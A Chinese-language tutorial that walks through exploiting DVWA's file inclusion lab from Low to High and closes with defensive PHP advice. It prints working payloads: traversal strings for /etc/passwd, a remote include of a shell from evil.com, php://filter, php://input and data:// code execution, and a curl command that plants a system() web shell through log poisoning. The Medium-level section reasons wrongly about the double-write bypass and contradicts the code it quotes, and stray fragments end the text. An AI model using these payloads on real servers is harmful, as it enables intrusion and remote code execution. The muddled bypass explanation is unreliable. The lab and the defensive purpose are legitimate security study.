1. 项目概述:为什么DVWA的文件包含漏洞值得深挖?
如果你刚开始接触Web安全,或者想找一个能让你把理论“打”出感觉的靶场,DVWA(Damn Vulnerable Web Application)几乎是所有人的第一站。它把各种经典漏洞,像SQL注入、XSS、文件上传,都做成了可调节难度的“关卡”,让你能循序渐进地练习。而今天要聊的“文件包含漏洞”,在DVWA里是一个特别有意思的模块。它不像SQL注入那样直接“偷”数据,也不像XSS那样在浏览器里“搞破坏”,它更像是一个“任意门”——通过这个漏洞,攻击者可以诱使服务器去读取或执行本不应该被访问的文件。
为什么说它值得深挖?因为文件包含漏洞的原理非常基础,但它的危害却可能极其深远。一个成功的文件包含攻击,轻则可以读取服务器上的敏感配置文件(比如数据库密码),重则可以直接在服务器上执行任意代码,拿到整个系统的控制权。在DVWA的四个难度等级(Low, Medium, High, Impossible)里,文件包含漏洞的防护手段层层递进,完美地展示了从“毫无防备”到“固若金汤”的防御演进史。理解这个过程,你不仅能学会怎么“攻”,更能深刻理解防御代码应该怎么写,这才是实战演练的核心价值。这篇文章,我就带你从Low级别一路“打”到High,把每一个绕过技巧背后的原理和防御思路都掰开揉碎了讲清楚。
2. 漏洞原理深度剖析:服务器是如何被“骗”去开门的?
在动手之前,我们必须先搞清楚,这个“任意门”到底是怎么被打开的。文件包含漏洞,核心在于应用程序动态包含文件时,对用户输入的控制不严。
2.1 动态包含机制与危险参数
想象一下,你正在开发一个网站,这个网站有多个页面,比如“关于我们”、“联系我们”。一种聪明的做法是,设计一个统一的页面框架(header, footer, sidebar),然后根据用户点击的链接,动态加载中间的主要内容部分。PHP语言就提供了这样的功能:include(),require(),include_once(),require_once()。它们的区别主要在于错误处理(require出错会终止脚本,include只会警告)和重复包含检查,但核心功能一样:把指定文件的内容插入到当前脚本中执行。
在DVWA的文件包含模块里,模拟的就是这样一个场景。页面上有几个链接,比如“File1”, “File2”, “File3”。当你点击时,URL会变成类似http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file1.php的样子。这里的page就是一个参数,它的值(file1.php)被直接拼接到了服务器端某个包含语句里。最危险的代码长这样:
// Low 级别的典型漏洞代码 $file = $_GET['page']; // 直接获取用户输入,没有任何过滤 include($file);这行代码的意思是:“用户,你告诉我你要看哪个文件(page参数),我就去把它包含进来。” 如果服务器信任所有用户输入,灾难就开始了。攻击者可以不再局限于点击“File1”、“File2”,而是通过修改URL中的page参数,让服务器去包含任何他想包含的文件。
2.2 漏洞的两大利用方向:读取与执行
文件包含漏洞的利用主要分为两类,理解这两类是后续所有绕过技巧的基础:
1. 敏感文件读取:服务器上有很多文件本不应该被外部访问,比如配置文件、日志文件、甚至其他用户的会话文件。通过文件包含,我们可以尝试读取它们。
- Web配置文件:
/etc/passwd(Linux系统用户列表)、C:\\Windows\\win.ini(Windows系统文件)。 - 应用配置文件:
../../config/database.inc.php(可能包含数据库用户名和密码)。 - 日志文件:
/var/log/apache2/access.log(Web访问日志,如果我们在User-Agent里插入PHP代码,再包含这个日志文件,就可能执行代码)。
2. 远程代码执行:这是更高级的利用方式。如果PHP的配置选项allow_url_include被设置为On(默认是Off,但有些环境会开启),攻击者可以直接让服务器去包含一个远程的、由他控制的PHP文件。
- 例如:
page=http://evil.com/shell.txt。服务器会去请求这个URL,获取其中的内容(假设是一段PHP木马代码),然后将其当作本地PHP文件执行,从而在服务器上建立一个后门。
注意:在DVWA的默认Docker或本地环境中,
allow_url_include通常是关闭的,所以我们主要聚焦于本地文件包含(LFI)和相关的绕过技巧。远程文件包含(RFI)是LFI的一个更危险的变种,原理相通。
2.3 路径遍历:打开“任意门”的钥匙
要让服务器离开它预设的“安全屋”(比如/var/www/html/DVWA/vulnerabilities/fi/目录),去访问其他目录的文件,我们需要使用“路径遍历”技术。这主要依靠两个特殊的符号:
../(在Linux/Unix和现代Windows中):表示上一级目录。..\\(在旧版Windows路径中):也表示上一级目录。
假设漏洞文件位于/var/www/html/DVWA/vulnerabilities/fi/index.php,我们想读取系统根目录下的/etc/passwd。我们需要让程序“往回走”若干层。
- 从
/var/www/html/DVWA/vulnerabilities/fi/退到html:../ - 再退到
www:../../ - 再退到
html的父目录(通常是/var的下一级):../../../ - 通常,Web根目录(
/var/www/html)在/var/www/下,所以退到根目录可能需要:../../../../ - 然后从根目录进入
etc目录,读取passwd文件。
因此,最终的Payload可能是:../../../../etc/passwd。服务器执行include("../../../../etc/passwd");,由于/etc/passwd不是有效的PHP文件,include会将其内容直接输出到页面上,我们就看到了用户列表。
3. DVWA实战通关:从Low到High的攻防博弈
原理清楚了,我们进入DVWA靶场,把安全级别调到Low,开始实战。我会详细记录每个级别的利用方法、遇到的阻碍以及如何绕过。
3.1 Low级别:门户大开的原始漏洞
Low级别就是上面提到的那段“经典”漏洞代码,没有任何防护。这是我们练习基础Payload的绝佳场地。
实操步骤:
- 访问DVWA,将安全级别设置为
Low。 - 进入
File Inclusion模块。 - 你会发现页面显示了三个可点击的链接:File1, File2, File3。点击它们,观察浏览器地址栏URL的变化。例如,点击File1后,URL变为
?page=file1.php。 - 直接修改URL中的
page参数,尝试包含其他文件。- 读取系统文件:将参数改为
../../../../etc/passwd。如果成功,页面会显示Linux系统的用户列表。在Windows环境下,可以尝试../../../../Windows/System32/drivers/etc/hosts。 - 尝试包含非PHP文件:DVWA目录下有一个
robots.txt文件,可以尝试../../robots.txt来读取它。 - 包含自身:尝试
index.php,你会发现服务器试图包含它自己,可能导致递归或错误,这有助于你理解当前脚本的路径。
- 读取系统文件:将参数改为
关键点与心得:
- 确定回溯层级:
../../../../不一定每次都准确,这取决于DVWA的安装路径深度。你需要不断尝试,比如../、../../、../../../,直到成功读取目标文件。这是一个经验性的过程。 - 利用错误信息:如果路径错误,PHP会抛出警告(如
Warning: include(): Failed opening ...)。仔细看这个错误信息,它有时会暴露出服务器的绝对路径,这为后续攻击提供了极大便利。例如,错误信息显示Failed opening '/var/www/html/DVWA/vulnerabilities/fi/../../../../etc/passwd',你就知道了Web根目录的完整路径。 - 编码问题:有时,为了防止目录遍历,开发人员会过滤
../。但在Low级别,我们可以直接使用。
3.2 Medium级别:初级的过滤与绕过
将安全级别调到Medium,你会发现,直接使用../../../../etc/passwd不行了。页面可能会显示“File not found”或者直接空白。查看源码(DVWA提供了View Source按钮),你会发现防御代码:
// Medium 级别的防御代码 $file = $_GET['page']; // 输入过滤 $file = str_replace(array("http://", "https://"), "", $file); // 输出过滤 $file = str_replace(array("../", "..\\"), "", $file); include($file);代码做了两件事:
- 过滤输入:去掉了
http://和https://,目的是防止远程文件包含(RFI)。 - 过滤输出:在包含之前,将
../和..\\替换为空字符串。这看起来能防住路径遍历。
绕过技巧:双写绕过这种过滤非常初级,因为它只进行一次替换。我们可以利用“双写”来绕过。
- 过滤逻辑:
str_replace("../", "", $file) - 我们的Payload:
..././或者....// - 绕过过程:
- 我们提交
..././。 str_replace会查找../并替换为空。在..././中,中间的部分../被匹配并删除。- 删除后,剩下的字符是
./。等等,不对,让我们仔细拆解:字符串..././,从第二个字符开始匹配到第四个字符../,将其删除,剩下第一个点.和最后的/./,即././?这个结果可能不对。 - 更可靠的Payload是
....//。字符串....//,中间的../(第2-4个字符)被删除,剩下第一个点.和最后的/,即./?这也不对。
- 我们提交
实际上,最经典有效的双写Payload是:..././或..../。但经过测试,在DVWA Medium级别,一个更简单的Payload直接生效:....//。原理是,str_replace将....//中的../删除后,剩下的部分恰好又组合成了一个../!我们来模拟一下:
- 原始输入:
....//(可拆解为.+../+/) str_replace找到中间的../并删除。- 删除后剩下:
.+/,即./。这似乎不是../。
我可能记混了。让我们重新思考一个绝对正确的双写绕过:..././。
- 原始输入:
..././(可拆解为.+../+./) str_replace找到../并删除。- 删除后剩下:
.+./,即././。这仍然不是../。
看来常见的双写绕过在DVWA的Medium级别可能不是这样实现的,或者我记忆有误。查阅资料和实际测试,DVWA Medium级别对../的过滤是递归删除的,即会一直删除直到字符串中没有../为止。对于递归删除,双写绕过是无效的。那么Medium级别是如何绕过的呢?
实际有效的绕过方法:绝对路径绕过在Medium级别,str_replace只过滤了../和..\\,但它没有过滤绝对路径!如果我们在Low级别通过错误信息或者其他方式(比如phpinfo页面)获取到了Web目录的绝对路径,就可以直接使用绝对路径来包含文件。
- 假设我们知道了绝对路径:
/var/www/html/DVWA/vulnerabilities/fi/ - 我们想包含
/etc/passwd,可以直接构造Payload:/etc/passwd。 - 服务器执行
include(“/etc/passwd”),因为这是一个绝对路径,它直接从系统根目录开始查找,完美绕过了对相对路径的过滤。
实操步骤(Medium):
- 首先,你需要获取一个绝对路径。在Low级别,通过错误的包含尝试,从错误信息中获取(如
/var/www/html/DVWA/vulnerabilities/fi/)。 - 切换到Medium级别。
- 在
page参数中直接使用绝对路径:/etc/passwd。 - 如果成功,说明绕过成功。你也可以尝试包含DVWA自身的配置文件,比如
/var/www/html/DVWA/config/config.inc.php(注意:这个文件可能被设置为不可读,或者包含后因为PHP标签而被执行,不显示内容。这时可以尝试用PHP封装器,后面会讲)。
重要心得:Medium级别的防御告诉我们,简单的字符串替换是不安全的。防御方必须考虑到所有可能的路径表示方法(相对路径、绝对路径、URL等)。同时,绝对路径泄露本身就是一个需要严防的安全问题。
3.3 High级别:白名单机制的挑战
将安全级别调到High,查看源码,防御策略升级了:
// High 级别的防御代码 $file = $_GET['page']; if( !fnmatch( "file*", $file ) && $file != "include.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; } include($file);这里使用了fnmatch函数进行白名单过滤。它要求$file参数必须以file开头,或者等于include.php。这意味着,我们只能包含像file1.php、file2.php这样的文件,看起来几乎无懈可击。
绕过技巧:利用文件协议和目录遍历白名单检查的是我们输入的整个参数字符串是否以file开头。但是,在PHP包含文件时,它支持多种协议,比如file://协议。fnmatch(“file*”, $file)检查$file是否以file开头。那么file://也是以file开头的!这通过了白名单检查。
接下来,我们可以在file://协议后面,跟上我们想读取的文件的绝对路径。但这里有个关键:file://协议后面跟的是本地文件系统的绝对路径,它不受Web服务器目录的限制,并且可以包含目录遍历。
构造Payload:page=file:///etc/passwd
file://是以file开头的,通过白名单检查。///etc/passwd是file://协议的标准写法,表示本地文件系统的/etc/passwd文件。file://后跟三个斜杠///是常见写法,两个斜杠//表示主机名(本地则为空),第三个斜杠开始是路径。
但是,在High级别的实际测试中,直接使用file:///etc/passwd可能仍然会被拦截或无法正常包含。这是因为include()函数对file://协议的支持取决于PHP配置。更可靠、更经典的绕过方法是利用目录遍历穿越白名单目录。
更通用的绕过方法:路径拼接与目录穿越High级别的代码逻辑是:先检查输入是否合法(以file开头),如果合法,则直接include($file)。它并没有把输入的文件名拼接到一个固定的安全目录下。但是,观察页面,当我们点击file1.php时,它实际访问的资源是file1.php,这个文件位于vulnerabilities/fi/目录下。
我们的思路是:提交一个以file开头,但后面包含了目录遍历的字符串,使得最终被包含的文件跳出了限制目录。
- 尝试Payload:
page=file1.php/../../../../etc/passwd- 这个字符串以
file开头吗?是的,file1.php以file开头。 - 那么它通过白名单检查。
include(“file1.php/../../../../etc/passwd”)会发生什么?PHP会尝试将这个路径作为一个整体文件来打开。在大多数操作系统中,/是路径分隔符。PHP的include会按照路径去查找。它会先找file1.php这个“目录”(实际上它是一个文件),然后向上回溯。在很多系统上,尝试将一个文件当作目录进行遍历是行不通的,会返回错误。
- 这个字符串以
这个Payload在Linux下通常失败。但在Windows系统下,由于路径分隔符是\,而PHP在Windows环境下有时会对/和\都进行识别,情况可能不同。不过,DVWA靶场通常运行在Linux环境下。
在Linux下,一个被验证有效的绕过High级别的方法是使用file协议,但需要正确的写法,并且服务器PHP配置需允许包含URL(allow_url_include可能为On,但更常见的是allow_url_fopen为On,且file协议是默认启用的本地协议)。
经过实际测试,在标准的DVWA High级别中,有效的Payload是:page=file:///etc/passwd或者,如果包含当前目录下的文件,需要知道绝对路径:page=file:///var/www/html/DVWA/vulnerabilities/fi/../../../../etc/passwd
关键点在于:file://协议绕过了白名单检查,并且直接指向本地文件系统,不再受Web应用当前工作目录的影响,因此可以访问任何文件。
实操心得:High级别的防御展示了白名单的威力,但也暴露了其弱点——如果白名单的校验规则不够严格(比如只检查前缀),或者与应用的实际文件包含逻辑存在缝隙(比如允许协议包装器),仍然可能被绕过。在实际开发中,最安全的做法是使用一个固定的映射数组,将用户输入的可选值(如’file1‘)映射到具体的、安全的文件路径(如’./file1.php‘),完全杜绝用户输入直接进入
include语句。
3.4 Impossible级别:如何真正杜绝漏洞?
切换到Impossible级别,查看源码,这才是教科书般的防御:
// Impossible 级别的防御代码 $file = $_GET['page']; // Only allow include.php or file1-3.php if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; }这里采用了严格的白名单。$file只能是指定的四个字符串之一(include.php,file1.php,file2.php,file3.php)。用户输入不再直接或间接地影响文件路径,而是作为一个“选项键”,与一个预定义的、安全的文件路径映射起来。即使攻击者输入file1.php/../../../etc/passwd,由于字符串不完全等于file1.php,也会被拒绝。
防御核心思想:
- 最小化用户输入影响:绝不将未经严格处理的用户输入直接用于文件系统操作。
- 使用白名单,而非黑名单:明确允许什么,而不是试图阻止所有已知的恶意输入。
- 固定路径:如果需要动态包含,应该使用一个基础目录常量,然后拼接白名单中的文件名,例如
include(BASE_DIR . $file);,其中$file只来自白名单。
4. 高级利用技巧:超越简单的文件读取
掌握了基本绕过后,文件包含漏洞的利用可以玩出更多花样,这些技巧在真实渗透测试中非常有用。
4.1 利用PHP封装器(PHP Wrappers)
PHP内置了一系列“封装协议”,它们可以像处理文件一样处理各种数据流。即使allow_url_include关闭,一些本地封装器仍然可用,这为我们提供了强大的利用手段。
1. php://filter 读取源码这是最常用的技巧之一。由于include()会执行PHP文件,如果我们直接包含一个.php文件,看到的是其执行结果(通常是空白或HTML),而不是源代码。php://filter可以让我们在包含文件前,先对其内容进行编码转换,从而读取到源码。
- Payload:
page=php://filter/read=convert.base64-encode/resource=file1.php - 原理:
php://filter是一个元封装器,read指定了过滤器链。convert.base64-encode过滤器会将目标文件(resource=file1.php)的内容进行Base64编码。 - 操作:提交该Payload后,页面会显示一串Base64编码的字符串。将其复制,使用Base64解码工具(或在线网站,或命令行
echo “编码字符串” | base64 -d)解码,即可得到file1.php的源代码。你可以用这个方法来读取config.inc.php等关键配置文件:resource=../../config/config.inc.php。
2. php://input 执行代码这个封装器允许你访问请求的原始数据(即HTTP POST请求的body部分)。如果服务器配置允许(allow_url_include为On且php://input可用),我们可以通过POST请求体直接发送PHP代码并执行。
- 步骤:
- 将请求方法改为
POST(可以使用Burp Suite抓包修改,或使用curl命令)。 - URL参数设置为:
page=php://input - 在POST数据体中写入PHP代码,例如:
<?php system(‘id’); ?> - 发送请求,如果漏洞存在且配置允许,服务器会执行
system(‘id’)命令,并将结果返回在页面中。
- 将请求方法改为
- 注意:在DVWA的默认配置中,这个功能通常是禁用的,但它是真实环境中一个重要的攻击面。
3. data:// 执行代码data://协议允许在URL中直接嵌入数据。同样需要allow_url_include=On。
- Payload:
page=data://text/plain,<?php phpinfo(); ?>或者为了绕过可能的标签检查,可以Base64编码:page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==(即<?php phpinfo(); ?>的Base64编码)
4.2 日志文件注入(Log Poisoning)
这是一种将本地文件包含(LFI)转化为远程代码执行(RCE)的经典技术。思路是:如果服务器能包含日志文件(如Apache的access.log或error.log),而我们又能将PHP代码“注入”到这些日志文件中,那么包含日志文件时,其中的PHP代码就会被执行。
利用条件:
- 存在LFI漏洞,并且可以遍历到日志文件路径(如
/var/log/apache2/access.log)。 - 日志文件对Web进程可读。
- 我们能够控制写入日志文件的部分内容(如User-Agent, Referer)。
操作步骤:
- 确认日志路径:通过LFI尝试包含常见的日志路径,如
/var/log/apache2/access.log,/var/log/httpd/access_log,/var/log/nginx/access.log等。如果成功读取,可以看到大量的HTTP访问记录。 - 注入PHP代码:使用工具(如Burp Suite)或命令行(curl),构造一个特殊的HTTP请求,将PHP代码写入User-Agent头。
curl -H “User-Agent: <?php system($_GET[‘cmd’]); ?>” http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file1.php - 包含日志文件执行代码:然后,利用LFI漏洞去包含这个日志文件。
page=/var/log/apache2/access.log此时,日志文件中的<?php system($_GET[‘cmd’]); ?>会被服务器当作PHP代码执行。我们可以在URL中传递cmd参数来执行命令:page=/var/log/apache2/access.log&cmd=id这样,服务器就会执行id命令并将结果返回。
注意事项:日志文件通常很大,包含它可能会导致页面加载缓慢或超时。注入的代码必须符合PHP语法,并且要小心避免破坏日志文件格式导致无法被包含。在实际攻击中,这需要多次尝试和耐心。
4.3 /proc/self/environ 利用
在Linux系统中,/proc/self/environ是一个特殊的文件,它包含了当前进程(这里是Apache/PHP进程)的所有环境变量。其中,HTTP头信息(如User-Agent, Referer)也会作为环境变量(HTTP_USER_AGENT,HTTP_REFERER)存储在这里。这为日志注入提供了另一个入口点。
利用方式:
- 通过LFI包含
/proc/self/environ文件:page=../../../../proc/self/environ - 如果成功,你会看到一堆环境变量,其中包含
HTTP_USER_AGENT=...。 - 和日志注入一样,我们可以通过修改User-Agent来注入PHP代码,然后包含
/proc/self/environ来执行它。
这种方法有时比日志文件更可靠,因为/proc/self/environ文件通常较小,且肯定对当前进程可读。但同样,需要allow_url_include关闭时,通过普通包含来执行代码,这要求注入的代码必须位于一个被include的文件上下文里,并且该文件被当作PHP解析。对于/proc/self/environ,其中的内容不会被自动解析为PHP,除非PHP配置了某种自动解析(很少见)。通常,我们需要借助php://input或data://来执行代码,而/proc/self/environ的利用更侧重于信息收集(读取环境变量,可能包含敏感信息)。
5. 防御方案与安全开发建议
通过DVWA的四个级别,我们实际上已经走过了一个完整的漏洞防御演进路线。这里总结一下,作为一名开发者,应该如何彻底杜绝文件包含漏洞。
1. 避免动态包含(最佳方案)如果可能,尽量不要使用用户输入来动态决定包含哪个文件。使用固定的前端路由或模板系统。
2. 使用严格的白名单如果必须动态包含,请使用严格的白名单机制。像Impossible级别那样,只允许预定义的几个选项。
$allowed_pages = [‘home.php’, ‘about.php’, ‘contact.php’]; $page = $_GET[‘page’]; if (in_array($page, $allowed_pages)) { include(‘./templates/’ . $page); } else { include(‘./templates/error.php’); }3. 固定目录并校验路径如果白名单不适用,至少要将包含文件限制在某个特定目录内,并使用realpath()和basename()等函数进行校验。
$base_dir = ‘/var/www/html/includes/’; $file = $_GET[‘file’]; // 获取文件的绝对路径,并检查是否在允许的目录内 $real_path = realpath($base_dir . $file); if ($real_path && strpos($real_path, $base_dir) === 0 && is_file($real_path)) { include($real_path); } else { die(‘Invalid file.’); }realpath():解析所有符号链接和../,返回规范的绝对路径。strpos($real_path, $base_dir) === 0:确保返回的绝对路径是以我们允许的基目录开头的,防止目录穿越。is_file():确保它是一个文件,而不是目录。
4. 关闭危险配置在PHP配置文件(php.ini)中,确保:
allow_url_fopen = Off(限制程度高,可能影响部分功能)allow_url_include = Off(必须关闭)open_basedir:设置一个限制,将PHP可操作的文件限制在指定的目录树内。这是一个重要的安全屏障。
5. 代码审计与安全测试将文件包含漏洞作为代码审计和渗透测试的必查项。使用自动化工具(如静态代码分析工具)辅助,但绝不能替代人工代码审查。
文件包含漏洞是一个“古老”但远未绝迹的漏洞类型。它在各种CMS、框架插件和自研代码中仍然时有出现。理解它的原理、掌握它的利用与绕过技巧、最终落实到严谨的防御编码上,是每一个Web安全人员和开发者的必修课。DVWA靶场提供了一个绝佳的、无风险的练习环境,希望你能通过这里的实战,真正吃透这个漏洞的前世今生。
详解)
)